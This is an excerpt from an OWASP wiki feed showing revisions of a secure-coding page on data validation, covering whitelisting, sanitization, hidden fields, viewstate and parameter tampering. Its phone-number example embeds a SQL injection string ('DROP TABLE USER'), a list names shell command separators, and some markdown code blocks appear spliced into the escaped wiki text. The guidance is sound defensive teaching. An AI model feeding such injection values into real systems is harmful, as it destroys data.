&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, strUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, strPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
FROM UserTable&lt;br /&gt;
&lt;br /&gt;
WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Delimiter and special characters ==&lt;br /&gt;
&lt;br /&gt;
There are many characters that mean something special to various programs. Even if you follow the advice to accept only characters that are known to be good, it is very likely that a few delimiters will still catch you out. &lt;br /&gt;
&lt;br /&gt;
Here are the usual suspects:&lt;br /&gt;
&lt;br /&gt;
* NULL (zero) %00&lt;br /&gt;
&lt;br /&gt;
* LF - ANSI chr(10) &amp;quot;\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - ANSI chr(13) &amp;quot;\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CRLF - &amp;quot;\r\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - EBCDIC 0x0f &lt;br /&gt;
&lt;br /&gt;
* Quotes &amp;quot; '&lt;br /&gt;
&lt;br /&gt;
* Commas, slashes, spaces, tabs, and other whitespace - used in CSV, tab-delimited output, and other specialist formats&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;&amp;gt; - XML and HTML tag markers, redirection characters&lt;br /&gt;
&lt;br /&gt;
* ; &amp;amp; - Unix and NT shell command separators&lt;br /&gt;
&lt;br /&gt;
* @ - used for e-mail addresses&lt;br /&gt;
&lt;br /&gt;
* 0xff&lt;br /&gt;
&lt;br /&gt;
* ... more&lt;br /&gt;
&lt;br /&gt;
Whenever you code to a particular technology, you should determine which characters are &amp;quot;special&amp;quot; and either prevent them from appearing in input or properly escape them.&lt;br /&gt;
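For a free-text field, that usually amounts to a whitelist that simply never admits the delimiters. The character class below is an illustrative policy for a name field, not a universal rule:

```java
import java.util.regex.Pattern;

public class NameValidator {
    // Letters, digits, spaces, hyphens and apostrophes only, 1-50 characters:
    // none of the delimiters listed above can get through.
    private static final Pattern NAME_OK = Pattern.compile("^[A-Za-z0-9 '\\-]{1,50}$");

    public static boolean isValidName(String input) {
        return input != null && NAME_OK.matcher(input).matches();
    }
}
```

NULs, quotes-plus-semicolons, and redirection characters are all rejected without ever being enumerated.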
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ASP.NET 2.0 Viewstate&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://channel9.msdn.com/wiki/default.aspx/Channel9.HowToConfigureTheMachineKeyInASPNET2&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Validation]]&lt;br /&gt;
[[Category:Encoding]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59753</id>
		<title>Data Validation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59753"/>
				<updated>2009-05-01T12:11:00Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Selects, radio buttons, and checkboxes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is robust against all forms of input data, whether obtained from the user, infrastructure, external entities or database systems.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data. All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The most common web application security weakness is the failure to properly validate input from the client or environment. This weakness leads to almost all of the major vulnerabilities in applications, such as [[Interpreter Injection]], locale/Unicode attacks, file system attacks and buffer overflows. Data from the client should never be trusted, since the client has every opportunity to tamper with it.&lt;br /&gt;
&lt;br /&gt;
In many cases, [[Encoding]] has the potential to defuse attacks that rely on lack of input validation. For example, if you use HTML entity encoding on user input before it is sent to a browser, it will prevent most [[Cross-site Scripting (XSS)|XSS]] attacks. However, simply preventing attacks is not enough - you must perform [[Intrusion Detection]] in your applications. Otherwise, you are allowing attackers to repeatedly attack your application until they find a vulnerability that you haven't protected against. Detecting attempts to find these weaknesses is a critical protection mechanism.&lt;br /&gt;
&lt;br /&gt;
==Definitions ==&lt;br /&gt;
&lt;br /&gt;
These definitions are used within this document:&lt;br /&gt;
&lt;br /&gt;
* '''Integrity checks'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data has not been tampered with and is the same as before&lt;br /&gt;
&lt;br /&gt;
* '''Validation'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters, and, for numbers, is correctly signed and within range boundaries &lt;br /&gt;
&lt;br /&gt;
* '''Business rules'''&lt;br /&gt;
&lt;br /&gt;
Ensure that data is not only validated, but business rule correct. For example, interest rates fall within permitted boundaries.&lt;br /&gt;
&lt;br /&gt;
Some documentation and references use these terms interchangeably, which is very confusing to all concerned. This confusion directly causes continuing financial loss to the organization. &lt;br /&gt;
&lt;br /&gt;
==Where to include integrity checks ==&lt;br /&gt;
&lt;br /&gt;
Integrity checks must be included wherever data passes from a trusted to a less trusted boundary, such as from the application to the user's browser in a hidden field, or to a third-party payment gateway (for example, a transaction ID that is used internally upon return). &lt;br /&gt;
&lt;br /&gt;
The type of integrity control (checksum, HMAC, encryption, digital signature) should be directly related to the risk of the data transiting the trust boundary. &lt;br /&gt;
&lt;br /&gt;
==Where to include validation ==&lt;br /&gt;
&lt;br /&gt;
Validation must be performed on every tier. However, validation should be performed as per the function of the server executing the code. For example, the web / presentation tier should validate for web related issues, persistence layers should validate for persistence issues such as SQL / HQL injection, directory lookups should check for LDAP injection, and so on.&lt;br /&gt;
&lt;br /&gt;
==Where to include business rule validation ==&lt;br /&gt;
&lt;br /&gt;
Business rules are known during design, and they influence implementation. However, there are bad, good and &amp;quot;best&amp;quot; approaches. Often the best approach is the simplest in terms of code. &lt;br /&gt;
&lt;br /&gt;
===Example - Scenario ===&lt;br /&gt;
&lt;br /&gt;
* You are to populate a list with accounts provided by the back-end system&lt;br /&gt;
* The user will choose an account, choose a biller, and press next&lt;br /&gt;
&lt;br /&gt;
===Wrong way===&lt;br /&gt;
&lt;br /&gt;
The account select option is read directly and provided in a message back to the backend system, without validating that the account number is one of the accounts provided by the backend system.&lt;br /&gt;
&lt;br /&gt;
===Why this is bad===&lt;br /&gt;
&lt;br /&gt;
An attacker can change the HTML in any way they choose:&lt;br /&gt;
&lt;br /&gt;
* The lack of validation requires a round-trip to the backend to provide an error message that the front end code could easily have eliminated&lt;br /&gt;
&lt;br /&gt;
* The back end may not be able to cope with the data payload the front-end code could have easily eliminated. For example, buffer overflows, XML injection, or similar. &lt;br /&gt;
&lt;br /&gt;
===Acceptable Method ===&lt;br /&gt;
&lt;br /&gt;
The account select option parameter (&amp;quot;payee_id&amp;quot;) is read by the code, and compared to an already-known list. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
if (account.hasPayee( session.getParameter(&amp;quot;payee_id&amp;quot;) )) {&lt;br /&gt;
    backend.performTransfer( session.getParameter(&amp;quot;payee_id&amp;quot;) );&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This prevents parameter tampering, but requires the list of possible payee_id's to be calculated beforehand.&lt;br /&gt;
&lt;br /&gt;
===Best Method ===&lt;br /&gt;
&lt;br /&gt;
Instead, the code should emit simple indexes (&amp;lt;option value=&amp;quot;1&amp;quot; ... &amp;gt;) rather than account numbers, and resolve the index on the server:&lt;br /&gt;
&lt;br /&gt;
''int payeeLstId = Integer.parseInt(session.getParameter(&amp;quot;payeelstid&amp;quot;));''&lt;br /&gt;
&lt;br /&gt;
''accountFrom = account.getAcctNumberByIndex(payeeLstId);''&lt;br /&gt;
&lt;br /&gt;
Not only is this easier to render in HTML, it makes validation and business rule validation trivial. Provided that out-of-range indexes are rejected, the field cannot be usefully tampered with.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- dkaplan: why is this the best?  I can see how it can make things easier to guess.  Where before I had to guess an account name, now I can just put in 9 if I see a list of id's from 1-8 and this code example doesn't directly check the integrity of that.  I think this needs more explanation. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Conclusion ===&lt;br /&gt;
&lt;br /&gt;
To provide defense in depth and to prevent attack payloads from crossing trust boundaries to backend hosts (which are probably incapable of handling arbitrary input data), business rule validation should be performed (preferably in workflow or command patterns), even if it is known that the back end code performs its own business rule validation.&lt;br /&gt;
&lt;br /&gt;
This is not to say that the entire set of business rules need be applied - it means that the fundamentals are performed to prevent unnecessary round trips to the backend and to prevent the backend from receiving most tampered data.&lt;br /&gt;
&lt;br /&gt;
==Data Validation Strategies ==&lt;br /&gt;
&lt;br /&gt;
There are four strategies for validating data, and they should be used in this order:&lt;br /&gt;
&lt;br /&gt;
===Accept known good===&lt;br /&gt;
&lt;br /&gt;
This strategy is also known as &amp;quot;whitelist&amp;quot; or &amp;quot;positive&amp;quot; validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected.  Data should be:&lt;br /&gt;
&lt;br /&gt;
* Strongly typed at all times&lt;br /&gt;
* Length checked, with field lengths minimized&lt;br /&gt;
* Range checked if a numeric&lt;br /&gt;
* Unsigned unless required to be signed&lt;br /&gt;
* Syntax or grammar should be checked prior to first use or inspection&lt;br /&gt;
&lt;br /&gt;
If you expect a postcode, validate for a postcode (type, length and syntax):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String isPostcode(String postcode) {&lt;br /&gt;
    return (postcode != null &amp;amp;&amp;amp; Pattern.matches(&amp;quot;^(((2|8|9)\\d{2})|((02|08|09)\\d{2})|([1-9]\\d{3}))$&amp;quot;, postcode)) ? postcode : &amp;quot;&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Coding guidelines should use some form of visible tainting on input from the client or untrusted sources, such as third-party connectors, to make it obvious that the input is unsafe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String taintPostcode = request.getParameter(&amp;quot;postcode&amp;quot;);&lt;br /&gt;
ValidationEngine validator = new ValidationEngine();&lt;br /&gt;
String validPostcode = validator.isPostcode(taintPostcode);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Reject known bad===&lt;br /&gt;
&lt;br /&gt;
This strategy, also known as &amp;quot;negative&amp;quot; or &amp;quot;blacklist&amp;quot; validation, is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of &amp;quot;known bad&amp;quot; characters and patterns forever, and you will by definition have incomplete protection.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
public String removeJavascript(String input) {&lt;br /&gt;
&lt;br /&gt;
    Pattern p = Pattern.compile(&amp;quot;javascript&amp;quot;, Pattern.CASE_INSENSITIVE);&lt;br /&gt;
&lt;br /&gt;
    Matcher m = p.matcher(input);&lt;br /&gt;
&lt;br /&gt;
    return (!m.find()) ? input : &amp;quot;&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It can take upwards of 90 regular expressions (see the CSS Cheat Sheet in the Development Guide 2.0) to eliminate known malicious input, and each regex needs to be run over every field. Obviously, this is slow and not secure. Just rejecting the &amp;quot;current known bad&amp;quot; (at the time of writing, hundreds of strings and literally millions of combinations) is insufficient if the input is a free-form string. This strategy is directly akin to anti-virus pattern updates. Unless the business will allow the &amp;quot;bad&amp;quot; regexes to be updated daily and will fund someone to research new attacks regularly, this approach will be bypassed before long.&lt;br /&gt;
&lt;br /&gt;
===Sanitize===&lt;br /&gt;
&lt;br /&gt;
Rather than accept or reject input, another option is to change the user input into an acceptable format.&lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Whitelist ====&lt;br /&gt;
&lt;br /&gt;
Any characters which are not part of an approved list can be removed, encoded or replaced.&lt;br /&gt;
&lt;br /&gt;
Here are some examples:&lt;br /&gt;
&lt;br /&gt;
If you expect a phone number, you can strip out all non-digit characters.  Thus, &amp;quot;(555)123-1234&amp;quot;, &amp;quot;555.123.1234&amp;quot;, and &amp;quot;555\&amp;quot;;DROP TABLE USER;--123.1234&amp;quot; all convert to 5551231234.  Note that you should proceed to validate the resulting numbers as well.  As you see, this is not only beneficial for security, but it also allows you to accept and use a wider range of valid user input.&lt;br /&gt;
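The phone-number example above can be sketched as follows (the class and method names here are illustrative, not from the guide, and the 10-digit rule is an assumed North-American format):&lt;br /&gt;

```java
import java.util.regex.Pattern;

public class PhoneSanitizer {
    private static final Pattern NON_DIGIT = Pattern.compile("[^0-9]");

    /** Strip every non-digit character, then validate the result:
        sanitized input must still pass a positive check. */
    public static String sanitize(String input) {
        if (input == null) {
            return "";
        }
        String digits = NON_DIGIT.matcher(input).replaceAll("");
        // Assumed format: a North-American-style number has exactly 10 digits.
        return digits.length() == 10 ? digits : "";
    }
}
```

Both &quot;(555)123-1234&quot; and the SQL-laced variant reduce to 5551231234; anything that does not validate after stripping is rejected.&lt;br /&gt;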
&lt;br /&gt;
If you want text from a user comment form, it is difficult to decide on a legitimate set of characters because nearly every character has a legitimate use.  One solution is to replace all non alphanumeric characters with an encoded version, so &amp;quot;I like your web page&amp;quot;, might emerge from your sanitation routines as &amp;quot;I+like+your+web+page%21&amp;quot;.  (This example uses [http://en.wikipedia.org/wiki/Url_encoding URL encoding].)&lt;br /&gt;
&lt;br /&gt;
You can also go one step further.  Say you want to set up a site where users can upload arbitrary files so they can share them or download them again from another location.  In this case validation is impossible because there is no valid or invalid content.  Because your only concern is protecting your app from malicious input and you don't need to actually do anything except accept, store and transmit the file, you can encode the entire file in, say  [http://en.wikipedia.org/wiki/Base64 base 64].  &lt;br /&gt;
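A minimal sketch of that idea, using the JDK's java.util.Base64 (this API arrived in Java 8, well after this guide was written, so treat it as one possible implementation rather than the guide's own):&lt;br /&gt;

```java
import java.util.Base64;

public class OpaqueFileStore {
    /** Encode arbitrary bytes so that no downstream component (HTML page,
        SQL query, shell command) can interpret them as anything active. */
    public static String encode(byte[] content) {
        return Base64.getEncoder().encodeToString(content);
    }

    /** Decode for transmission back to a user; the bytes are still
        untrusted and must be served with a safe Content-Type. */
    public static byte[] decode(String stored) {
        return Base64.getDecoder().decode(stored);
    }
}
```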
&lt;br /&gt;
==== Sanitize with Blacklist ====&lt;br /&gt;
&lt;br /&gt;
Eliminate or translate characters (such as to HTML entities or to remove quotes) in an effort to make the input &amp;quot;safe&amp;quot;. &lt;br /&gt;
Like blacklists, this approach requires maintenance and is usually incomplete. As most fields have a particular grammar, it is simpler, faster, and more secure to simply validate a single correct positive test than to try to include complex and slow sanitization routines for all current and future attacks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String quoteApostrophe(String input) {&lt;br /&gt;
    if (input != null)&lt;br /&gt;
        return input.replaceAll(&amp;quot;[\']&amp;quot;, &amp;quot;&amp;amp;amp;rsquo;&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        return null;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===No validation===&lt;br /&gt;
&lt;br /&gt;
This is inherently unsafe and strongly discouraged. The business must sign off on each and every instance of no validation, as the lack of validation usually leads directly to the bypass of application, host, and network security controls.&lt;br /&gt;
&lt;br /&gt;
 account.setAcctId(request.getParameter(&amp;quot;formAcctNo&amp;quot;));&lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 public void setAcctId(String acctId) {&lt;br /&gt;
 	cAcctId = acctId;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==Prevent parameter tampering ==&lt;br /&gt;
&lt;br /&gt;
There are many input sources:&lt;br /&gt;
&lt;br /&gt;
* HTTP headers and CGI variables, such as REMOTE_ADDR, PROXY_VIA or similar&lt;br /&gt;
&lt;br /&gt;
* Environment variables, such as getenv() or via server properties &lt;br /&gt;
&lt;br /&gt;
* All GET, POST and Cookie data&lt;br /&gt;
&lt;br /&gt;
: This includes supposedly tamper-resistant fields such as radio buttons, drop downs, etc. - any client side HTML can be re-written to suit the attacker&lt;br /&gt;
&lt;br /&gt;
* Configuration data (mistakes happen :))&lt;br /&gt;
&lt;br /&gt;
* External systems (via any form of input mechanism, such as XML input, RMI, web services, etc)&lt;br /&gt;
&lt;br /&gt;
All of these data sources supply untrusted input. Data received from untrusted data sources must be properly checked before first use.&lt;br /&gt;
&lt;br /&gt;
==Hidden fields ==&lt;br /&gt;
&lt;br /&gt;
Hidden fields are a simple way to avoid storing state on the server. Their use is particularly prevalent in &amp;quot;wizard-style&amp;quot; multi-page forms. However, their use exposes the inner workings of your application, and exposes data to trivial tampering, replay, and validation attacks. In general, only use hidden fields for page sequence.&lt;br /&gt;
&lt;br /&gt;
If you have to use hidden fields, there are some rules:&lt;br /&gt;
&lt;br /&gt;
* Secrets, such as passwords, should never be sent in the clear&lt;br /&gt;
&lt;br /&gt;
* Hidden fields need integrity checks and should preferably be encrypted using non-constant initialization vectors (i.e. different users at different times get different, yet cryptographically strong, random IVs)&lt;br /&gt;
&lt;br /&gt;
* Encrypted hidden fields must be robust against replay attacks, which means some form of temporal keying&lt;br /&gt;
&lt;br /&gt;
* Data sent to the user and returned in hidden fields must be re-validated on the server once the last page has been received, even if it was validated before being sent - this helps reduce the risk from replay attacks.&lt;br /&gt;
&lt;br /&gt;
The preferred integrity control is at least an HMAC using SHA-256, or preferably a digital signature or encryption using PGP. IBMJCE supports SHA-256, but PGP support in the JCE requires the inclusion of the Legion of the Bouncy Castle (http://www.bouncycastle.org/) JCE classes.&lt;br /&gt;
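A sketch of an HMAC-SHA256 seal for a hidden-field value, using the standard javax.crypto API (the class, the field layout, and the method names are illustrative assumptions; key management and temporal keying are out of scope here):&lt;br /&gt;

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.util.Base64;

public class HiddenFieldSealer {
    /** Append an HMAC-SHA256 tag to a hidden-field value. The key is a
        server-side secret, never sent to the client; to resist replay,
        fold a timestamp or nonce into the value before sealing. */
    public static String seal(String value, byte[] key) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(key, "HmacSHA256"));
            byte[] tag = mac.doFinal(value.getBytes(StandardCharsets.UTF_8));
            return value + "|" + Base64.getEncoder().encodeToString(tag);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Recompute the tag on the round-tripped value and compare in constant time. */
    public static boolean verify(String sealed, byte[] key) {
        int sep = sealed.lastIndexOf('|');
        if (sep < 0) {
            return false;
        }
        String expected = seal(sealed.substring(0, sep), key);
        return MessageDigest.isEqual(
                expected.getBytes(StandardCharsets.UTF_8),
                sealed.getBytes(StandardCharsets.UTF_8));
    }
}
```

Any tampering with the round-tripped value changes the recomputed tag and the verification fails.&lt;br /&gt;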
&lt;br /&gt;
It is simpler to store this data temporarily in the session object. Using the session object is the safest option, as the data is never visible to the user, and it requires (far) less code, nearly no CPU, disk, or I/O utilization, less memory (particularly on large multi-page forms), and less network consumption. &lt;br /&gt;
&lt;br /&gt;
In the case of the session object being backed by a database, large session objects may become too large for the inbuilt handler. In this case, the recommended strategy is to store the validated data in the database, but mark the transaction as &amp;quot;incomplete.&amp;quot; Each page will update the incomplete transaction until it is ready for submission. This minimizes the database load, session size, and activity between the users whilst remaining tamperproof. &lt;br /&gt;
&lt;br /&gt;
Code containing hidden fields should be rejected during code reviews.&lt;br /&gt;
&lt;br /&gt;
==ASP.NET Viewstate ==&lt;br /&gt;
&lt;br /&gt;
ASP.NET sends form data back to the client in a hidden “Viewstate” field. Despite looking forbidding, this is not encryption at all (the data is merely base64 encoded), and in ASP.NET 1.0 it has no data integrity without further action on your behalf. In ASP.NET 1.1 and 2.0, tamper proofing, called &amp;quot;enableViewStateMac&amp;quot;, is on by default and uses a SHA-1 hash.&lt;br /&gt;
&lt;br /&gt;
Any application framework with a similar mechanism might be similarly at risk – you should investigate your application framework’s support for sending data back to the user. Preferably, such data should not round trip to the client at all.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
These configurations are set hierarchically in the .NET framework. The machine.config file contains the global configuration; each web directory may contain a web.config file further specifying or overriding the configuration; and each page may contain @page directives specifying the same configuration or overrides. You must check all three locations:&lt;br /&gt;
&lt;br /&gt;
* If the enableViewStateMac is not set to “true”, you are at risk if your viewstate contains authorization state&lt;br /&gt;
&lt;br /&gt;
* If the viewStateEncryptionMode is not set to “always”, you are at risk if your viewstate contains secrets such as credentials&lt;br /&gt;
&lt;br /&gt;
* If you share a host with many other customers, you all share the same machine key by default in ASP.NET 1.1. In ASP.NET 2.0, it is possible to configure unique viewstate keys per application&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If your application relies on data returning from the viewstate without being tampered with, you should turn on viewstate integrity checks at the least, and strongly consider:&lt;br /&gt;
&lt;br /&gt;
* Encrypt viewstate if any of the data is application sensitive&lt;br /&gt;
&lt;br /&gt;
* Upgrade to ASP.NET 2.0 as soon as practical if you are on a shared hosting arrangement&lt;br /&gt;
&lt;br /&gt;
* Move truly sensitive viewstate data to the session variable instead&lt;br /&gt;
&lt;br /&gt;
===Selects, radio buttons, and checkboxes ===&lt;br /&gt;
&lt;br /&gt;
It is a commonly held belief that the value settings for these items cannot be easily tampered with. This is wrong. In the following example, actual account numbers are used, which can lead to compromise:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(1).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(2).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(2).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This produces (for example):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341234&amp;quot;&amp;gt;Gold Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341235&amp;quot;&amp;gt;Platinum Card&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the value is retrieved and then used directly in a SQL query, an interesting form of SQL injection may occur: authorization tampering leading to information disclosure. As the connection pool connects to the database using a single user, it may be possible to see other users' accounts if the SQL looks something like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = request.getParameter(&amp;quot;acctNo&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acctNo = ?&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This should be re-written to retrieve the account number via an index, and to include the client's unique ID, to ensure that other users' valid account numbers are not exposed:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = acct.getCardNumber(Integer.parseInt(request.getParameter(&amp;quot;acctIndex&amp;quot;)));&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acct_id = ? AND acctNo = ?&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acct.getID());&lt;br /&gt;
&lt;br /&gt;
st.setString(2, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach requires rendering input values from 1 to x, and assumes the accounts are stored in a Collection which can be iterated using logic:iterate:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;logic:iterate id=&amp;quot;loopVar&amp;quot; name=&amp;quot;MyForm&amp;quot; property=&amp;quot;values&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio property=&amp;quot;acctIndex&amp;quot; idName=&amp;quot;loopVar&amp;quot; value=&amp;quot;value&amp;quot;/&amp;gt;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:write name=&amp;quot;loopVar&amp;quot; property=&amp;quot;name&amp;quot;/&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/logic:iterate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The code will emit HTML with the values &amp;quot;1&amp;quot; .. &amp;quot;x&amp;quot; as per the collection's content. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
